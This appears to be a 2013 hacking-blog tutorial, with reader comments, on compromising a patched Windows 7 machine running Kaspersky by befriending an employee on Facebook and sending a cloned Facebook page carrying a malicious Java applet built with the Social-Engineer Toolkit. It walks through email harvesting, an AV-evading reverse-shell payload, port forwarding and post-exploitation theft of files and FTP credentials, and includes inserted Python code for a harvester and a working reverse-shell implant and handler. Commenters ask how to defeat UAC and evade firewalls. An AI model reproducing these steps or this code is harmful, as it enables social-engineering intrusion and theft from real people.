How To Hack Windows 7 And Bypass Firewall And Kaspersky Antivirus

Ever tried to hack Windows 7? Ever tired of trying to bypass antivirus? Then this tutorial is for you. You want to know how to attack a fully patched Windows 7 SP1 x64 with all of its security defenses enabled and running (UAC, DEP, ASLR, EMET, etc.).

Not only that, but Kaspersky Internet Security 2012 is installed, activated and updated to the minute, running with its default options (firewall, application control, proactive defense, etc.).

As we know, Windows 7 SP1 has no public remote exploits comparable to MS08-067 for XP or MS09-050 for Vista; Windows 7 is better hardened and exploit development against it is much harder (good job, Microsoft). Most internet users have Firefox, Chrome or Internet Explorer, not necessarily all of them but one or two (I use all of them at once :) ).

They also have Adobe Flash Player and Oracle Java installed, so they can watch clips and movies on YouTube and enjoy online games and applications that require Java and Flash. Most of them run an antivirus with its firewall enabled by default, typically one of
(ESET, Avira, Avast, Kaspersky, BitDefender, etc.)

Let’s take a look at the best anti-virus in the world, according to the "Real World" Protection Test (chart updated at the time of writing):

[chart: "Real World" Protection Test results, with a download link for the report]

We can see that Kaspersky Internet Security 2012 and BitDefender are the best.

But Kaspersky is the best one from my point of view :)
Let’s imagine this scenario:
I am working as a penetration tester at a big security company. They asked me to conduct a penetration test for a big customer, client side/social engineering only: no web application, network or wireless testing, just client side.

I said OK, let’s do it.

We finished all the paperwork and other legal stuff; now I am thinking about how I can penetrate this company.
My big company told me that the big customer web site URL is (
I made a quick search using Google

Then I used another tool, theHarvester; you can find it in BackTrack 5 R2 or download it from
I found many emails:

That is good; now I have a starting point and can target all the emails I found.
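As an added example (my own code, not part of the original post and not theHarvester's code), here is the core of what a harvester does with the raw text it scrapes from search results and web pages: pull out e-mail addresses, undo the common "[at]"/"[dot]" obfuscation, keep only addresses on the target domain and its subdomains, drop duplicates, and report which mail hosts the addresses reveal. The sample text and every name and host in it are constructed for the example.

```python
import re

# Constructed sample input: the kind of text a harvester scrapes from search
# results and web pages. Every name and address here is made up.
SAMPLE_TEXT = """
Contact: John.Doe@Example.com, jane.doe@example.com
Support mailbox: support [at] example [dot] com
Press office: press (at) mail.example.com
Duplicate entry: JOHN.DOE@EXAMPLE.COM
Not our target: someone@other-corp.org and root@examplecorp.com
Malformed: bob@example..com
"""

# "[at]" / "(at)" and "[dot]" / "(dot)" spellings that sites use to defeat
# naive scrapers. Plain " at " is deliberately not handled: it would turn
# "meet at example.com" into a false positive.
_OBFUSCATED_AT = re.compile(r"\s*[\[\(\{]\s*at\s*[\]\)\}]\s*", re.IGNORECASE)
_OBFUSCATED_DOT = re.compile(r"\s*[\[\(\{]\s*dot\s*[\]\)\}]\s*", re.IGNORECASE)

# Deliberately strict address pattern: at least one label before a 2+ letter
# TLD, so "bob@example..com" is rejected rather than harvested.
_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}", re.ASCII)


def deobfuscate(text: str) -> str:
    """Rewrite 'user [at] host [dot] tld' into 'user@host.tld'."""
    text = _OBFUSCATED_AT.sub("@", text)
    return _OBFUSCATED_DOT.sub(".", text)


def in_scope(address: str, domain: str) -> bool:
    """True for addresses on the target domain or any of its subdomains."""
    host = address.rsplit("@", 1)[1]
    return host == domain or host.endswith("." + domain)


def harvest_emails(text: str, domain: str) -> list:
    """Return unique, lower-cased in-scope addresses in first-seen order."""
    seen, found = set(), []
    for match in _EMAIL.findall(deobfuscate(text)):
        address = match.lower()
        if address in seen or not in_scope(address, domain):
            continue
        seen.add(address)
        found.append(address)
    return found


def hosts(addresses: list) -> list:
    """Mail hosts revealed by the harvested addresses (sorted, unique)."""
    return sorted({a.rsplit("@", 1)[1] for a in addresses})


if __name__ == "__main__":
    emails = harvest_emails(SAMPLE_TEXT, "example.com")
    print("\n".join(emails))
    print("hosts:", ", ".join(hosts(emails)))
```

The domain filter matters more than it looks: "examplecorp.com" is rejected even though it starts with the target name, and the address on "mail.example.com" is kept because it is a real subdomain, which is also how you learn about the customer's mail host.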
Now, I know this is a big customer and a big company, so they must have big security as well:
antivirus and a modern, hardened operating system like Windows 7 SP1.
So public exploits against IE, Firefox, Flash, Adobe Reader and other local programs will not work, and the antivirus would detect the exploits I send to my targets and remove them.
So my best chance is an evil Java applet, tricking the victim into running it.
But the victim must have Java installed on his system.
OK, that is fine, since many internet users have Java installed, including me :)

OK, time to hunt them all...
I searched in

I entered all the emails I have and found a lot of interesting information, like:

Note: this is FAKE; I cannot disclose sensitive information about the big company :)

As you can see: name, age, location, gender, and also a Facebook account.

I added him as a friend on Facebook and we are now friends.

I chatted with him about his company and some general talk.

After some time we had built up a little trust with each other (enough that I can send him images or links).

Now I will start my BackTrack 5 R2 machine and run this cool program:

the Social-Engineer Toolkit, AKA SET

Now it’s time to attack my target.

I will create an evil Java applet. In the SET menus I choose:
2) Website Attack Vectors
 1) Java Applet Attack Method

After that:
1)      Web Templates

And then:
4. Facebook

Now the most important part: we must use a payload that is not detected by security products (AV, IPS).

I know that my victim is using Kaspersky Internet Security 2012 and Windows 7 SP1; I asked him in our Facebook chat, “What is the best anti-virus you recommend?”

He replied, “Oh, the best one is Kaspersky Internet Security 2012. We are using it in our company and I personally have it installed on Windows 7.”

In my penetration testing lab I tried many payloads and most of them were detected by Kaspersky :(
But payload number 11

  11) SE Toolkit Interactive Shell            Custom interactive reverse toolkit designed for SET

works like a charm and no AV detects it :) (It is a custom reverse shell written for SET rather than a stock Metasploit payload, which is presumably why it had no signature at the time of writing.)

Then I choose it and choose port 443 as the local port the payload will connect back to.

Note: I forwarded two ports on my router (443 and 80) to my BackTrack machine, so the victim can reach me when the payload executes. The payload connects out from the victim to my port 443, so nothing needs to be opened on the victim’s side; only the attacker’s router needs the port forwarding.

Now we are good and ready.

Now we must send our external IP to the victim. We can find it with a website like this one

and you will see your external IP like this

We can hide the external IP by using a URL-shortening website to conceal it

You can see that my external IP is hidden now!

Now I can send him the link, and when he clicks on it he sees the cloned Facebook page loaded with my Java applet. Note that Kaspersky is running.

Java shows its security warning for the applet, and he clicks Run (he is secure and doesn’t fear anything :) ). Everything in this attack depends on that click: nothing is exploited, the user simply grants the applet permission to run. (Java 7 Update 51 and later block self-signed applets by default, so on an up-to-date Java this prompt no longer offers a Run button.)

Now he has clicked Run and I can see:

Kaspersky is running, Java is running and everything is secure :)

But I have a remote shell on the target machine.
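To make the port-forwarding note and the “shell” interaction concrete, here is an added lab example (my own code, not SET’s “SE Toolkit Interactive Shell” and not the payload the post generates). It runs both ends of a reverse connection in one process over the loopback interface: the implant side connects out to the handler, the direction that lets it pass a firewall that only blocks inbound connections, and the handler side then sends commands and receives their output over a simple length-prefixed protocol. The loopback host, the ephemeral port and the framing are assumptions made for the example; in the post’s setup the handler would listen on the forwarded port 443 and the implant would connect to the attacker’s external IP.

```python
import socket
import struct
import subprocess
import threading

# Framing assumed for this example: 4-byte big-endian length, then payload.
# (SET's interactive shell uses its own protocol; this is not it.)


def send_msg(sock: socket.socket, data: bytes) -> None:
    sock.sendall(struct.pack(">I", len(data)) + data)


def recv_exact(sock: socket.socket, n: int):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:          # peer closed the connection
            return None
        buf += chunk
    return buf


def recv_msg(sock: socket.socket):
    header = recv_exact(sock, 4)
    if header is None:
        return None
    (length,) = struct.unpack(">I", header)
    return recv_exact(sock, length)


def run_command(cmd: str) -> bytes:
    """The 'shell' mode: run one command line through the platform shell."""
    proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=30)
    return proc.stdout + proc.stderr


def implant(handler_host: str, handler_port: int) -> None:
    """Victim side. Note the direction: it connects OUT to the handler, so
    the victim's firewall never sees an inbound connection attempt."""
    with socket.create_connection((handler_host, handler_port)) as s:
        send_msg(s, b"session from " + socket.gethostname().encode())
        while True:
            cmd = recv_msg(s)
            if cmd is None or cmd == b"exit":
                break
            send_msg(s, run_command(cmd.decode()))


class Handler:
    """Attacker side: listens on the forwarded port and drives the session."""

    def __init__(self, bind_host: str = "127.0.0.1", port: int = 0):
        self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.srv.bind((bind_host, port))   # port 0 = pick a free port for the lab
        self.srv.listen(1)
        self.port = self.srv.getsockname()[1]
        self.conn = None

    def wait_for_session(self) -> str:
        self.conn, _ = self.srv.accept()
        return recv_msg(self.conn).decode(errors="replace")

    def shell(self, cmd: str) -> str:
        send_msg(self.conn, cmd.encode())
        return recv_msg(self.conn).decode(errors="replace")

    def close(self) -> None:
        send_msg(self.conn, b"exit")
        self.conn.close()
        self.srv.close()


def lab_demo(cmd: str = "echo hello"):
    """Run handler and implant in one process over loopback; return
    (session banner, command output)."""
    handler = Handler()
    victim = threading.Thread(target=implant, args=("127.0.0.1", handler.port), daemon=True)
    victim.start()
    banner = handler.wait_for_session()
    output = handler.shell(cmd).strip()
    handler.close()
    victim.join(timeout=5)
    return banner, output


if __name__ == "__main__":
    print(lab_demo())
```

Two things worth noticing from the detection side: the traffic to port 443 here is plain TCP with no TLS, so a proxy or IDS that expects a TLS handshake on 443 would see the command strings in the clear, and the implant process is whatever the user approved (the Java runtime in the post), which is why application-level firewall rules that trust a signed Java binary let it connect out.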

Now I can do many things:

Just press 1 to start interacting with the open session,

then type help to view all supported commands.

I always like a pure Windows command shell,

so I type “shell”

and then “tasklist” to list all running processes and services.


OMG “Kaspersky is running :)”

Now it is time to view files, download/upload, and do some real-world Windows post-exploitation.
We owned our victim and found many sensitive files, such as usernames and passwords, private documents and photos :) and FileZilla FTP credentials; we connected with those FTP credentials, and you know the rest...

“Man, WE defeated them all!!”

Now it is time to write a nice report.

I hope you enjoyed this (FAKE) real-world scenario.

About The Author

Mohamed Ramadan is a security researcher from Egypt. He is interested in penetration testing, malware reverse engineering, securing websites and servers, and forensics. He also teaches penetration testing at


  1. I'm using BackTrack 5. Can it be used as well?

  2. Wow!! Nice one!! Really, I expected this one ;)
    After a very long time, a nice one to read on RHA.


  3. Nice post... I really like it :)

  4. Please help!! When I choose option 2 "Website Attack Vectors" it gives me the following error:
    " Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
    Press {return} to go back to the main menu."

  5. How do I open a port in the router???

  6. @Anonymous

    Try this:

    1. Go to cd /pentest/exploits/set/config
    2. gedit set_config
    3. search for something like metasploit path:
    4. Replace it with /opt/metasploit/msf3

  7. Just click on this link to learn how to open ports in your router.


  8. Hello Rafay bro, can you write an article about opening a port on a router?

  9. Good, Mr. Mohaab

    thanks :)

    my BaDer

  11. It tells me " Sorry. Metasploit was not found. This feature does not work properly without Metasploit.
    Press {return} to go back to the main menu."
    I'm doing exactly what you say:
    1. Go to cd /pentest/exploits/set/config
    2. gedit set_config
    3. search for something like metasploit path: this one, where must I search for it??? plz help me
    4. Replace it with /opt/metasploit/msf3

  12. Our group would like to ask the fellow commenters to join us here:

  13. Hi Rafay,

    Thanks for sharing this wonderful tutorial.
    I was able to do the test on a Windows 7 box in my lab environment;
    however, when I typed regedit from "shell", the user (me) was asked whether he wanted to open the application (UAC). My question:
    How do I defeat UAC? The victim should not suspect anything.

    With regards


  14. I am using the nmap software for detecting open ports. Before I installed Avast Internet Security it was working perfectly fine, but now it can't scan any open ports. Kindly help me with how to get nmap through my Windows firewall and Avast firewall.

  15. Does this hack still work?

  16. You call this hacking ?

  17. I want to connect to a remote computer through wifi without touching the other computer... can you help me with it???

  18. Thanks a lot, man. It helped me a lot.

  19. Damn right, users are always the weakest link in any system.



Rafay Baloch is an independent security researcher, internet marketer, entrepreneur and SEO consultant. He is the founder of the RHA blog and multiple other blogs. Rafay became known after finding a remote code execution bug in PayPal, for which PayPal awarded him $10,000.


RHA © 2013. All Rights Reserved.